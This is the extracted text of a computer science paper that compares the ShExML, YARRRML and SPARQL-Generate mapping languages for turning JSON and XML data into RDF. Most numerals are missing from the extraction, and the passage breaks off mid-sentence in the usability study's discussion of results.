( ) report a platform to import and lift from spreadsheet to rdf with a human- computer interface. using sparql . syntax tarql (http://tarql.github.io/) offers an engine to transform from csv to rdf. csvw proposed a w c recommendation to define csv to rdf transformations using a dedicated dsl (tandy, herman & kellogg, ). from databases to rdf along with the xml ecosystem, relational database transformation to rdf is another field: bizer & seaborne ( ) present a platform to access relational databases as a virtual rdf store. a mechanism to directly map relational databases to rdf and owl is described by sequeda, arenas & miranker ( ); this direct mapping produces a owl ontology which is used as the basis for the mapping to rdf. triplify (auer et al., ) allows to publish relational data as linked data converting http-uri requests to relational database queries. one of the most relevant proposals is r rml (das, sundara & cyganiak, ) that became a w c recommendation in . r rml offers a standard language to define conversions from relational databases to rdf. in order to offer a more intuitive way to declare mapping from databases to rdf, stadler et al. ( ) presented sml which bases its mappings into sql views and sparql construct queries. more comprehensive reviews of tools and comparisons of tools for the purpose of lifting from relational databases to rdf are presented by (michel, montagnat & zucker, ; hert, reif & gall, ; sahoo et al., ). many to one transformations many to one transformations is a recent topic which has evolved to overcome the problem that one to one transformations need a different solution for each format and that subsequently must be maintained. source-centric approaches source-centric approaches are those that, even giving the possibility of transforming multiple data sources to multiple serialisation formats, they base their transformation mechanism in one to one transformations. this can deliver optimal results—if exported to rdf—due to rdf compositional property. some of the tools available are: openrefine (http://openrefine.org/) which allows to perform data cleanup and transformation to other formats, datatank (http://thedatatank.com/) which offers transformation of data by means of a restful architecture, virtuoso sponger (http: //vos.openlinksw.com/owiki/wiki/vos/virtsponger) is a middleware component of virtuoso able to transform from a data input format to another serialisation format, rdfizers (http://wiki.opensemanticframework.org/index.php/rdfizers) employs the open semantic framework to offer hundreds of different format converters to rdf. the datalift (scharffe et al., ) framework also offers the possibility of transforming raw data to semantic interlinked data sources. text-based approaches the use of a mapping language as the way to define all the mappings for various data sources was first introduced by rml (dimou et al., ) which extends r rml syntax (turtle garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://tarql.github.io/ http://openrefine.org/ http://thedatatank.com/ http://vos.openlinksw.com/owiki/wiki/vos/virtsponger http://vos.openlinksw.com/owiki/wiki/vos/virtsponger http://wiki.opensemanticframework.org/index.php/rdfizers http://dx.doi.org/ . /peerj-cs. based) to cover heterogeneous data sources. with rml implementations it is possible to gather data from: xml, json, csv, databases and so on; and put them together in the same rdf output. 
a similar approach was also followed in kr rml (slepicka et al., ) which proposed an alternative interpretation of r rml rules paired with a source-agnostic processor facilitating data cleaning and transformation. to deal with non-relational databases, michel et al. ( ) presented xr rml language which extends r rml and rml specifications. then, sparql-generate (lefrançois, zimmermann & bakerally, ) was proposed which extends sparql syntax to serve as a mapping language for heterogeneous data. this solution has the advantage of using a very well-known syntax in the semantic web community and that its implementation is more efficient than rml main one (i.e., rmlmapper (https://github.com/rmlio/rml-mapper)) (lefrançois, zimmermann & bakerally, ). to offer a simpler solution for users of text-based approaches, yarrrml (heyvaert et al., ) was introduced which offers a yaml based syntax and its processor (https://github.com/rmlio/yarrrml-parser) performs a translation to rml rules. graphical-based approaches graphical tools offer an easier way to interact with the mapping engine and are more accessible to non-expert users. some of the tools mentioned in the previous source- centric approaches section have graphical interfaces, like openrefine and datatank. rmleditor (heyvaert et al., ) offers a graphical interface for the creation of rml rules. related studies some studies have been made to evaluate available tools and languages. lefrançois, zimmermann & bakerally ( ) compared sparql-generate implementation to rmlmapper. their results showed that sparql-generate has a better computational performance when transforming more than csv rows in comparison with rmlmapper. they also concluded that sparql-generate language is easier to learn and use for semantic web practitioners (who are likely already familiar with sparql), but this was based on a limited analysis of the cognitive complexity of query/mappings in the two languages. rmleditor, a graphical tool to generate rml rules was proposed by heyvaert et al. ( ). they performed a usability evaluation for their tool with semantic web experts and non-experts. in the case of semantic web experts they also evaluate the differences between the textual approach (rml) and this new visual one. however, rmleditor was neither compared with other similar tools nor rml with other languages. heyvaert et al. ( ) proposed yarrrml as a human-readable text-based representation which offers an easier layer on top of rml and r rml. however, the authors did not present any evaluation of this language. meester et al. ( ) made a comparative characteristic analysis of different mapping languages. however, a qualitative analysis is not performed and usability is only mentioned in nf ‘‘easy to use by semantic web experts’’ which only yarrrml and sparql-generate achieve. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rmlio/rml-mapper https://github.com/rmlio/yarrrml-parser http://dx.doi.org/ . /peerj-cs. thus, to the best of our knowledge no usability study was performed in these languages which share the easiness of use as one of their goals. therefore, we introduce this study as a first step into the usability evaluation of heterogeneous data mapping languages. presentation of the languages under study in this section we compare yarrrml, sparql-generate and shexml syntax by means of a simple example. 
these three tools each offer a dsl able to define mappings for heterogeneous data sources, as we have seen in the previous section, and their designers share the goal of being user friendly (meester et al., ; garcía-gonzález, fernández-Álvarez & gayo, ). rml and similar alternatives are not included in the comparison because they have a verbose syntax very close to the rdf data model. while it might be an interesting solution for users without any programming knowledge but familiar with rdf, we consider it more like a lower-level middle language to compile to rather than a language to be used by programmers and data engineers. indeed, the yarrrml and shexml engines are able to compile their mappings to rml. for the sake of the example, two small files in json and xml are presented in listing and listing respectively. each of these files defines two films with attributes (which may differ in name and structure) that will be translated to the rdf output shown in listing . in this example, and with the aim of keeping it simple, different ids are used in each entity; however, it is possible to use objects with the same ids that could be merged into a single entity or divided into different new entities depending on the user's intention.

listing : json films file

{
  "films": [
    {
      "id": ,
      "title": "inception",
      "date": " ",
      "countryoforigin": "usa",
      "director": "christopher nolan",
      "screenwriter": "christopher nolan"
    },
    {
      "id": ,
      "title": "the prestige",
      "date": " ",
      "countryoforigin": "usa",
      "director": "christopher nolan",
      "screenwriter": ["christopher nolan", "jonathan nolan"]
    }
  ]
}

listing : xml films file

<films>
  <film id=" ">
    <name>dunkirk</name>
    <year> </year>
    <country>usa</country>
    <director>christopher nolan</director>
    <screenwriters>
      <screenwriter>christopher nolan</screenwriter>
    </screenwriters>
  </film>
  <film id=" ">
    <name>interstellar</name>
    <year> </year>
    <country>usa</country>
    <director>christopher nolan</director>
    <screenwriters>
      <screenwriter>christopher nolan</screenwriter>
      <screenwriter>jonathan nolan</screenwriter>
    </screenwriters>
  </film>
</films>

listing : rdf output

@prefix : <http://example.com/> .

: :country "usa" ;
  :screenwriter "jonathan nolan" , "christopher nolan" ;
  :director "christopher nolan" ;
  :name "the prestige" ;
  :year : .
: :country "usa" ;
  :screenwriter "christopher nolan" ;
  :director "christopher nolan" ;
  :name "inception" ;
  :year : .
: :country "usa" ;
  :screenwriter "jonathan nolan" , "christopher nolan" ;
  :director "christopher nolan" ;
  :name "interstellar" ;
  :year : .
: :country "usa" ;
  :screenwriter "christopher nolan" ;
  :director "christopher nolan" ;
  :name "dunkirk" ;
  :year : .

yarrrml

listing : yarrrml transformation script for the films example

prefixes:
  ex: "http://example.com/"
mappings:
  films_json:
    sources:
      - ['films.json~jsonpath', '$.films[*]']
    s: ex:$(id)
    po:
      - [ex:name, $(title)]
      - [ex:year, ex:$(date)~iri]
      - [ex:director, $(director)]
      - [ex:screenwriter, $(screenwriter)]
      - [ex:country, $(countryoforigin)]
  films_xml:
    sources:
      - ['films.xml~xpath', '//film']
    s: ex:$(@id)
    po:
      - [ex:name, $(name)]
      - [ex:year, ex:$(year)~iri]
      - [ex:director, $(director)]
      - [ex:screenwriter, $(screenwriters/screenwriter)]
      - [ex:country, $(country)]

yarrrml is designed with human-readability in mind, which is achieved through a yaml-based syntax. listing shows the mappings films_json and films_xml for our films example. each mapping starts with a source definition that contains the query to be used as iterator, e.g., //film. it is followed by the definition of the output, given by a subject definition (s:) and a number of associated predicate-object definitions (po:).
subject and predicate-object definitions can use "partial" queries relative to the iterator to populate the subject and object values. this way of defining mappings is very close to rml; yarrrml actually does not provide an execution engine but is translated to rml.

sparql-generate

listing : sparql-generate transformation script for the films example

base 
prefix iter: <http://w3id.org/sparql-generate/iter/>
prefix fun: <http://w3id.org/sparql-generate/fn/>
prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>
prefix xsd: <http://www.w3.org/2001/XMLSchema#>
prefix : <http://example.com/>
prefix dbr: <http://dbpedia.org/resource/>
prefix schema: <http://schema.org/>
prefix sc: 

generate {
  ?id_json :name ?name_json ;
           :year ?year_json ;
           :director ?director_json ;
           :country ?country_json .
  generate {
    ?id_json :screenwriter ?screenwriter_json .
  }
  iterator iter:split(?screenwriters_json, ",") as ?screenwriters_json_iterator
  where {
    bind(replace(?screenwriters_json_iterator, "\\[|\\]|\"", "") as ?screenwriter_json)
  } .
  ?id_xml :name ?name_xml ;
          :year ?year_xml ;
          :director ?director_xml ;
          :country ?country_xml .
  generate {
    ?id_xml :screenwriter ?screenwriter_xml .
  }
  iterator iter:xpath(?film_xml, "/film/screenwriters[*]/screenwriter") as ?screenwriters_xml_iterator
  where {
    bind(fun:xpath(?screenwriters_xml_iterator, "/screenwriter/text()") as ?screenwriter_xml)
  } .
}
iterator iter:jsonpath( , "$.films[*]") as ?film_json
iterator iter:xpath( , "//film") as ?film_xml
where {
  bind(iri(concat("http://example.com/", str(fun:jsonpath(?film_json, "$.id")))) as ?id_json)
  bind(fun:jsonpath(?film_json, "$.title") as ?name_json)
  bind(fun:jsonpath(?film_json, "$.director") as ?director_json)
  bind(iri(concat("http://example.com/", fun:jsonpath(?film_json, "$.date"))) as ?year_json)
  bind(fun:jsonpath(?film_json, "$.countryoforigin") as ?country_json)
  bind(fun:jsonpath(?film_json, "$.director") as ?directors_json)
  bind(fun:jsonpath(?film_json, "$.screenwriter") as ?screenwriters_json)
  bind(iri(concat("http://example.com/", fun:xpath(?film_xml, "/film/@id"))) as ?id_xml)
  bind(fun:xpath(?film_xml, "/film/name/text()") as ?name_xml)
  bind(fun:xpath(?film_xml, "/film/director/text()") as ?director_xml)
  bind(iri(concat("http://example.com/", fun:xpath(?film_xml, "/film/year/text()"))) as ?year_xml)
  bind(fun:xpath(?film_xml, "/film/country/text()") as ?country_xml)
}

sparql-generate is an extension of sparql . for querying heterogeneous data sources and creating rdf and text. it offers a set of sparql binding functions and sparql iterator functions to achieve this goal. the mapping for our films example is shown in listing . the output of the mapping is given within the generate clauses and can use variables and iris, while queries, iri and variable declarations are declared in the where clause. sparql-generate is an expressive language that can be further extended using the sparql . extension system. on the other side, sparql-generate scripts tend to be verbose compared to the other two languages studied in this paper.
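whatever the language, the scripts above are meant to produce the same rdf graph given in the rdf output listing earlier. a quick way to check that two engines agree (a sketch using the rdflib python library; the file names are hypothetical and assume each engine's output has been saved as turtle) is a graph isomorphism test:

    from rdflib import Graph
    from rdflib.compare import isomorphic

    expected = Graph().parse("expected_films.ttl", format="turtle")   # the expected rdf output
    produced = Graph().parse("yarrrml_output.ttl", format="turtle")   # output of one of the engines
    print(isomorphic(expected, produced))  # true when both graphs contain the same triples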
shexml

listing : shexml transformation script for the films example

prefix : <http://example.com/>
source films_xml_file <https://raw.githubusercontent.com/herminiogg/shexml/master/src/test/resources/filmspaper.xml>
source films_json_file <https://raw.githubusercontent.com/herminiogg/shexml/master/src/test/resources/filmspaper.json>
iterator film_xml <xpath: //film> {
    field id <@id>
    field name <name>
    field year <year>
    field country <country>
    field director <director>
    field screenwriters <screenwriters/screenwriter>
}
iterator film_json <jsonpath: $.films[*]> {
    field id <id>
    field name <title>
    field year <date>
    field country <countryoforigin>
    field director <director>
    field screenwriters <screenwriter>
}
expression films <films_xml_file.film_xml union films_json_file.film_json>
:films :[films.id] {
    :name [films.name] ;
    :year :[films.year] ;
    :country [films.country] ;
    :director [films.director] ;
    :screenwriter [films.screenwriters] ;
}

shexml, our proposed language, can be used to map xml and json documents to rdf. the shexml mapping for the films example is presented in listing . it consists of source definitions followed by iterator definitions; the latter define structured objects whose fields are populated with the results of source queries. the output of the mapping is described using a shape expression (shex) (prud'hommeaux, labra gayo & solbrig, ; boneva, labra gayo & prud'hommeaux, ) which can refer to the previously defined fields. the originality of shexml, compared to the other two languages studied here, is that the output is defined only once even when several sources are used. this is a design choice that allows the user to separate concerns: how to structure the output on the one hand, and how to extract the data on the other hand.

comparing languages features

in this subsection we compare the features of the languages and which operations are supported or not in each of them (see table ). iterators, sources, fields, unions and so on are common to the three languages as they have the same objective. they have different syntaxes, as can be seen in the three examples, but from a functionality point of view there are no differences.

table : features comparison between the three languages.
  features | shexml | yarrrml | sparql-generate
  source and output definition:
  defining output | shape expression | subject and predicate-object definitions | generate clause
  iris generation | prefix and value generation expression (concatenation) | prefix and value generation expression (array) | variable (previous use of concat function) or string interpolation
  datatypes & language tags | yes | yes | yes
  multiple results from a query | treated like an array | treated like an array | need to iterate over the results
  transformations | limited (matchers and string operators) | fno hub | functions for strings and extension mechanism
  output formats:
  output | rdf | rdf | rdf and any text-based format
  translation | rml | rml | no translation offered
  link between mappings | shape linking and join keyword (do not fully cover yarrrml feature) | yes (conditions allowed) | nested generate clauses, filter clauses and extension mechanism
  conditional mapping generation | no | yes (function and conditional clause) | yes (filter clause and extension mechanism)

source and output definition and their artefacts: as we saw, the mechanism to define the form of the rdf output has a different flavour in the three languages: subject and predicate-object definitions for every source in yarrrml, generate clauses for every source in sparql-generate, and a single shape expression in shexml. additionally, the three languages offer slightly different operators for constructing the output values. all of them typically obtain iris by concatenating a source value to some prefix, and reuse literal values as is. yarrrml supports the generation of multiple named graphs, whereas sparql-generate can only generate one named graph at a time and shexml only generates rdf datasets.

multiple results: the handling of multiple results, as occurs in the screenwriters case, is different between sparql-generate and the two other languages. in yarrrml and shexml, if a query returns multiple results they are treated as a list. however, in sparql-generate this functionality must be explicitly declared, as can be seen in listing ; this leads to complex iterator definitions like the one used for the json screenwriters.

transformations: the possibility of transforming the output to another value by means of a function is very useful for different purposes when building a knowledge graph. in yarrrml this is supported through the fno mechanism (meester et al., ), which offers a way to define functions inside mapping languages in a declarative fashion. sparql-generate offers some functions for strings embedded inside the sparql binding functions mechanism; however, it is possible to extend the language through the sparql . extension mechanism. in the case of shexml, only matchers and string operations are offered for transformation purposes.

other formats output: the output format of yarrrml and shexml is limited to rdf, whereas sparql-generate can also generate plain text, enabling the potential transformation to a lot of different formats. in this aspect, sparql-generate presents a much more flexible output. conversely, the yarrrml and shexml engines offer a translation of their mappings to rml rules, which improves interoperability with other solutions.

link to other mappings: in yarrrml there is the possibility to link mappings between them. this functionality is provided by giving the name of the mapping to be linked and the condition that must be satisfied (e.g., id of mapping a equal to id of mapping b). this can be useful when the subject is generated with a certain attribute but this attribute does not appear in the other file, so the linking should be done using another attribute. in shexml this can be partially achieved by shape linking (a syntactic sugar to avoid repeating an expression twice) and by the join clause, which gives an implementation for primary interlinking covering a subset of what is covered by yarrrml mapping linking.
In SPARQL-Generate this kind of linking can be achieved using nested GENERATE clauses and FILTER clauses.

Conditional mapping generation: sometimes there is a need to generate triples only when some condition is fulfilled. In YARRRML this is achieved using the conditional clause together with a function. In SPARQL-Generate it can be obtained with the SPARQL 1.1 FILTER clauses and also with the extensibility mechanism offered by the language. In ShExML this is currently not possible.

Further features of SPARQL-Generate: apart from what has been presented in the previous points, SPARQL-Generate, being based on SPARQL 1.1, offers more expressiveness than the other two languages. One possibility that emerges from this is the use of defined variables. For example, it is possible to define an iterator of numbers and then use those numbers to request different parts of an API. This versatility enables the creation of very complex and rich scripts that can cover many use cases. It is natural to expect that learning to use the full capabilities of SPARQL-Generate is complex, as the language offers many features. In our experiments, however, only some basic features of the language were required and, as shown in 'Results', it appears that the design of SPARQL-Generate did not help test subjects to solve the proposed tasks easily.

Methodology

In order to test our hypothesis that ShExML is easier for first-time users experienced only in programming and the basics of Linked Data, an experiment was carried out. The University of Oviedo granted ethical approval to carry out the described study. Verbal consent was requested before starting the experiment.

Experiment design

The selected tools were YARRRML (http://rml.io/yarrrml/), SPARQL-Generate (https://ci.mines-stetienne.fr/sparql-generate/) and ShExML (http://shexml.herminiogarcia.com/). We decided not to include RML (http://rml.io/) and similar alternatives for the same reason mentioned in 'Presentation of the languages under study'. Three manuals were designed for the students, based on the films example, describing how the integration could be done with each tool. The experiment was designed to be performed in each tool's dedicated online environment, which is available through the Internet as a web page. In addition, a small manual was developed to guide the students through the experiment and to inform them about the input files and the expected outputs (this material can be consulted at https://github.com/herminiogg/shexml-paper- -data/tree/master/experiment-material). This manual contained two tasks, designed to be performed sequentially, i.e., the student should finish the first task before starting the second one. The first task was the mapping and integration of two files (JSON and XML) with information about books, which should be mapped into a single RDF graph. The final output should be equal to the one given in the guide. The second task was to modify the script produced in the previous task so that the prices are separated and can be compared between markets; in other words, the multiple prices are tagged individually, referring to the market where each specific price was found, as they were in the input files (a sketch of the expected change in the output is given below).
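As a rough reading of what this second task asks for, the sketch below contrasts the two shapes of output using rdflib; the property IRIs (ex:price, ex:priceUK, ex:priceUS) and the values are invented for illustration and are not the vocabulary or data used in the experiment.

    from rdflib import Graph, Literal, Namespace
    from rdflib.namespace import XSD

    EX = Namespace("http://example.com/")   # assumed vocabulary
    book = EX["book1"]

    # Task 1 style: one undifferentiated price per book.
    g1 = Graph()
    g1.add((book, EX.price, Literal("12.50", datatype=XSD.decimal)))

    # Task 2 style: one price statement per market, so prices can be compared.
    g2 = Graph()
    g2.add((book, EX.priceUK, Literal("12.50", datatype=XSD.decimal)))
    g2.add((book, EX.priceUS, Literal("14.95", datatype=XSD.decimal)))

    print(g2.serialize(format="turtle"))

In all three languages the requested change boils down to emitting one market-specific statement per source price instead of a single undifferentiated one.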
This second task gives us an intuition of how easy it is to modify an existing set of data mapping rules in each language.

The study was designed as a mixed-methods approach, including a quantitative analysis and a qualitative analysis. For the quantitative measures, Mousotron (http://www.blacksunsoftware.com/mousotron.html) was used, which allows registering the number of keystrokes, the distance travelled by the mouse, and so on. For the qualitative analysis, two Office forms were used, with questions based on a Likert scale (see the statements in the table below). In addition, the elapsed time was calculated from the timestamps in the Office forms.

Table: Statements to be evaluated by the students on a Likert scale, and the variable obtained from each.
- The experience with the tool was satisfactory: general satisfaction level
- The tool was easy to use: easiness of use
- The mapping definitions were easy: mapping definition easiness
- The language was easy to learn: learnability
- I find that this tool can be useful in my work: applicability
- The coding in this tool was intuitive: intuitiveness
- The language design leads to committing some errors: error proneness
- The error messages were useful to solve the problems: error reporting usefulness
- It was easy to define different predicates for the price: modifiability

Conduction

The sample consisted of the students (four women, the rest men) of the MSc in Web Engineering first-year course (out of two years) at the University of Oviedo (http://miw.uniovi.es/). Most of them hold a bachelor's degree in Computer Science or a similar field. They were taking a two-week Semantic Web course in which they were introduced to semantic technologies such as RDF, SPARQL, ShEx, etc. Before this course they had no previous knowledge of Semantic Web technologies. Regarding the subjects' prior knowledge of YAML, even though it is normally known and used by developers, we could not guarantee it. The experiment was held on the final day of the course. It was conducted in their usual classroom and with their whole-year-assigned computers, so that they were in a comfortable environment and with a computer they were familiar with. The three tools were assigned to the students in a random manner. Each student received the printed manual for their assigned tool and was given a fixed amount of time to read it, test the language in the online environment, and ask doubts and questions. Once this time had elapsed, the printed experiment guide was handed out and the experiment procedure was explained, with indications about Mousotron operation. In particular, the procedure followed to perform the whole experiment was:
1. Open the assigned tool on its dedicated webpage and clear the given example.
2. Open Mousotron and reset it.
3. Proceed with task 1 (start time registered for elapsed time calculation).
4. Once task 1 is finished, capture the Mousotron results (screenshot) and fill in the first Office questionnaire.
5. Reset Mousotron and proceed with task 2.
6. Once task 2 is finished, capture the Mousotron results (screenshot) and fill in the second Office questionnaire.

Analysis

The quantitative results were dumped into an Excel sheet and anonymised. Although many results can be used as given by the students, some of them need to be calculated. This is the case for the elapsed time (on both tasks), the completeness percentage and the precision. The elapsed time in the first task ($TT_1$) was calculated by subtracting the experiment start time ($STE$) from the beginning time of the first questionnaire ($STQ_1$), i.e., $TT_1 = STQ_1 - STE$. The elapsed time in the second task ($TT_2$) was calculated by subtracting the ending time of the first questionnaire ($ETQ_1$) from the beginning time of the second questionnaire ($STQ_2$), i.e., $TT_2 = STQ_2 - ETQ_1$. The completeness percentage was calculated from three measures: the proportion of correctly generated triples, the proportion of correctly translated data, and the proportion of correctly generated prefixes and datatypes, each contributing a fixed share of the score, with the triple structure weighted highest. This design gives more importance to the structure, which is the main goal when using these tools. Other aspects, such as correct data (i.e., the object part of a triple), prefixes (i.e., using the correct prefix for the subject, the predicate and the object in the case of an IRI) and the datatype (i.e., putting the correct xsd type in the case of a literal object), are valued a little less, as these errors could more easily come from a distraction or an oversight. Let $CP$ be the completeness percentage, $T$ the number of triples, $D$ the number of data gaps and $P\&DT$ the number of prefixes and datatypes; then, with $w_T$, $w_D$ and $w_{P\&DT}$ denoting the three contribution weights mentioned above, the completeness percentage can be expressed as:

$$CP = w_T \cdot \frac{T_{total} - T_{generated}}{T_{total}} + w_D \cdot \frac{D_{total} - D_{generated}}{D_{total}} + w_{P\&DT} \cdot \frac{P\&DT_{total} - P\&DT_{generated}}{P\&DT_{total}}$$

Finally, the precision was calculated as the division of the student's elapsed time by the minimum elapsed time among all students, multiplied by the completeness percentage. This precision formulation gives us an intuition of how fast a given student was in comparison with the fastest student, with a correction depending on how good his or her solution was. Let $t_{s_n}$ be the elapsed time of student $n$ and $CP_{s_n}$ the completeness percentage of student $n$ calculated with the previous formula; then:

$$Precision_{s_n} = \frac{t_{s_n}}{\min(\{t_{s_1}, \ldots, t_{s_N}\})} \cdot CP_{s_n}$$

The results of the qualitative analysis were only anonymised, as they can be used directly from the Office output. The analysis was performed with the IBM SPSS software. We planned a one-way ANOVA test within the three groups for the quantitative variables where a normal distribution was found, and the Kruskal-Wallis test where it was not. The comparison between the three groups in the qualitative analysis was established using the Kruskal-Wallis test. The reporting and analysis of the results used Field as guidance and the suggested APA style as a standard manner of reporting statistical results.

Threats to validity

In this experiment we have identified the following threats to its validity.

Internal validity

We have identified the following internal validity threats in the experiment design:
• More expertise in some specific tool: in the Semantic Web area, as in other areas, people tend to be more expert in some specific technologies and languages. The derived risk is that this expertise can have an influence on the final results.
To alleviate this, we selected MSc students who are studying the same introductory Semantic Web course and we assigned the tools in a random manner.
• Not homogeneous group: it is possible that the selected group is not homogeneous in skills and previous knowledge. To mitigate this we applied the same measures as for the previous threat: students of the same Semantic Web course and a randomised tool assignment.
• Unfamiliar environment: in usability studies, unfamiliar environments can play a role in the final conclusions. Therefore, we opted to run the experiment in an environment well known to the students, that is, their whole-year classroom.
• More guidance and information about one tool: as we designed one of the languages, this could lead to a bias in information delivery. To mitigate this threat we developed three identical manuals, one for each tool. Questions and doubts were answered equally for all the students and tools.

External validity

Following the measures taken for the internal validity threats, we identified the corresponding external validity ones:
• Very focused sample: as we restricted the profile of the sample to students of an MSc course, who are more or less at the same knowledge level, there is the risk that these findings cannot be extrapolated to other samples or populations. It is possible that for Semantic Web practitioners, with different interests and expertise, these findings are not applicable. However, the intention of this study was to evaluate usability with first-time users as a first step to guide future studies.

Results

(The original datasets are available at https://github.com/herminiogg/shexml-paper- -data/tree/master/datasets.) From the students of the sample, in the first task, three of them left the experiment without completing any questionnaire: two for SPARQL-Generate and one for YARRRML. In the second task, only seven of the students completed the questionnaire: six for ShExML and one for YARRRML. The statistical analysis was made using the IBM SPSS software.

Task 1: as previously stated, the number of students that finished the proposed task, correctly or not, was as reported above. Descriptive statistics can be seen in the corresponding table. The comparison of the three groups was made by means of a one-way ANOVA, whose results showed significant differences in elapsed seconds (F( , )= . , p= . , ω= . ). As completeness percentage and precision do not follow a normal distribution in the SPARQL-Generate group (W( )= . , p= . and W( )= . , p= . ), the comparison was established by means of the Kruskal-Wallis test, which showed significant differences in both variables (H( )= . , p= . and H( )= . , p= . ). The post hoc test for elapsed seconds using Gabriel's criterion showed significant differences between the ShExML group and the YARRRML group (p= . ). The post hoc test for completeness percentage and precision using Bonferroni's criterion showed significant differences between ShExML and SPARQL-Generate (p= . , r= . and p= . , r= . ). The Likert-scale questionnaire results (α= , ) (see the corresponding figure) were analysed using the Kruskal-Wallis test, which resulted in significant differences between groups for the variables general satisfaction level (H( )= . , p= . ), easiness of use (H( )= . , p= . ), mapping definition easiness (H( )= . , p= . ) and learnability (H( )= . , p= . ). Bonferroni's criterion was used as the post hoc test for the variables with significant differences.
For general satisfaction level, significant differences were found between ShExML and YARRRML (p= . , r= . ). For easiness of use, significant differences were found between ShExML and YARRRML (p= . , r= . ). For mapping definition easiness, significant differences were found between ShExML and SPARQL-Generate (p= . , r= . ) and between ShExML and YARRRML (p= . , r= . ). For learnability, significant differences were found between ShExML and SPARQL-Generate (p= . , r= . ) and between ShExML and YARRRML (p= . , r= . ).

Task 2: in this task only seven students reached this step: six for ShExML and one for YARRRML. Descriptive statistics for this task can be seen in the corresponding table. No significant differences were found in any of the variables. In the subjective variable analysis (see the corresponding figure) no significant differences were found either.

Discussion

Statistical results discussion

The results of task 1 show that variables like keystrokes, left button clicks, right button clicks, mouse wheel scroll and meters travelled by the mouse do not have a significant variability depending on the tool used. This suggests that the web interfaces used as online development environments are more or less homogeneous and do not have an impact on the development of the scripts. However, the keystrokes results should be considered with caution because, for SPARQL-Generate, the mean completeness percentage was very low; therefore, achieving a final solution may involve more keystrokes. On the other hand, elapsed seconds, completeness percentage and precision show significant differences between groups, which suggests that the selected language has an influence on these variables.

Table: Descriptive statistics for the task 1 objective results, reporting, for each group (ShExML, YARRRML, SPARQL-Generate) and in total, the sample size n, mean x̄, standard deviation s, maximum and minimum for elapsed seconds, keystrokes, left button clicks, right button clicks, mouse wheel scroll, meters travelled by the mouse, completeness percentage and precision. (*) marks elapsed seconds, completeness percentage and precision as showing significant between-group differences, and (a) marks the groups with significant post hoc differences (ShExML and YARRRML for elapsed seconds; ShExML and SPARQL-Generate for completeness percentage and precision). Differences in totals are due to malfunctions while operating the capture software.

Figure: Task 1 results for the Likert-scale questionnaire, with results divided by question and group.
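For readers who want to reproduce this kind of comparison on their own data, the following sketch shows the test-selection logic described in the Analysis section (a Shapiro-Wilk normality check per group, then one-way ANOVA or Kruskal-Wallis) using SciPy; the group values are invented placeholders, not the study's measurements.

    from scipy import stats

    # Invented elapsed-time samples (seconds) for the three groups; the real
    # values are in the paper's dataset repository.
    groups = {
        "ShExML":          [610, 540, 700, 655],
        "YARRRML":         [980, 1100, 875, 1020],
        "SPARQL-Generate": [1500, 1320, 1680],
    }
    samples = list(groups.values())

    # Normality check per group (Shapiro-Wilk); if any group deviates from
    # normality, fall back to the non-parametric Kruskal-Wallis test.
    normal = all(stats.shapiro(s)[1] > 0.05 for s in samples)

    if normal:
        stat, p = stats.f_oneway(*samples)      # one-way ANOVA
        test = "one-way ANOVA"
    else:
        stat, p = stats.kruskal(*samples)       # Kruskal-Wallis H test
        test = "Kruskal-Wallis"

    print(f"{test}: statistic={stat:.3f}, p={p:.4f}")

A post hoc procedure (e.g., Bonferroni-corrected pairwise comparisons) would then be applied only to the variables for which this omnibus test is significant, as was done in the study.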
(*) means significant differences between groups and (a) and (b) means significant differences in the post hoc test between the marked groups at the level of significance α= . . full-size doi: . /peerjcs. /fig- moreover, we can see that elapsed seconds has a medium size effect (ω= . ). post hoc results show that there are significant differences between shexml and yarrrml which suggests that yarrrml users tend to need more time than shexml users for these tests. in the case of comparisons with sparql-generate there are not significant differences which can be due to the small sample size and the low completeness percentage. differences between shexml and sparql-generate for completeness percentage and precision suggest that sparql-generate users were not able to achieve working solutions as shexml users, which have the highest mean on both variables. however, between shexml and yarrrml groups there were no significant differences which is in line with the great variability of those two variables. results of task do not show any significant difference between the shexml group and the yarrrml group. this can be explained by the low sample size in the yarrrml group where only one individual made this step. however, completeness percentage and precision show us that some students did achieve a correct solution with shexml, whereas in yarrrml group and in sparql-generate group they did not. this leads to the conclusion that only the shexml group managed to find a working solution to both garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table descriptive statistics for task objective results where n is the sample size, x̄ is the mean, s is the standard deviation, max is the maximum value of the sample and min is the minimum value of the sample. differences in totals are due to malfunctions while operating capture software. measure group n x̄ s max min elapsed seconds shexml . . yarrrml total . . keystrokes shexml . . yarrrml total . . left button clicks shexml . . yarrrml total . . right button clicks shexml . . yarrrml total . . mouse wheel scroll shexml . . yarrrml total . meters travelled by the mouse shexml . . . yarrrml . . . total . . . completeness percentage shexml . . yarrrml total . . precision shexml . . yarrrml total . . proposed tasks. nevertheless, these conclusions must be validated with bigger experiments to have statistical confidence. the differences in completeness percentage and precision between shexml and sparql-generate and also between shexml and yarrrml in elapsed seconds can lead us to the conclusion that usability on first-time users is improved by using shexml over the other two languages, which answers rq . moreover, this conclusion is reinforced by the situation that in task neither yarrrml nor sparql-generate users were able to find a solution to this task. regarding the subjective analysis, significant differences were found between groups in general satisfaction level, mapping definition easiness easiness of use and learnability (as perceived by the students). on general satisfaction level significant differences were found between shexml and yarrrml which indicates that shexml users were more satisfied with the overall use of the tool respect to the yarrrml users. differences between sparql-generate users and the two other groups could not be established due to their low completeness percentage and precision rates. garcía-gonzález et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure task results for likert scale questionnaire where results are divided into the two groups. full-size doi: . /peerjcs. /fig- in the case of easiness of use significant differences were found between shexml and yarrrml which suggests that shexml users found this language easier to use than yarrrml users did with their language counterpart. in this case, like in the previous variable, significant differences could not be established between sparql-generate and the two other groups due to low completeness percentage. in mapping definition easiness differences were established between shexml group and yarrrml group and between shexml group and sparql-generate group which indicates that shexml users found mappings easier to define in shexml than in the other two languages. we also note that users did not find differences on mapping definition easiness between yarrrml and sparql-generate, this may be because sparql- generate users did not use the whole language. on learnability significant differences were found between shexml and sparql- generate and between shexml and yarrrml which suggests that the users found easier to learn shexml than the other two languages. however, no significant differences were found between yarrrml and sparql-generate which seems strange due to the difference of verbosity between the two languages. differences on subjective analysis between shexml and yarrrml on general satisfaction level, mapping definition 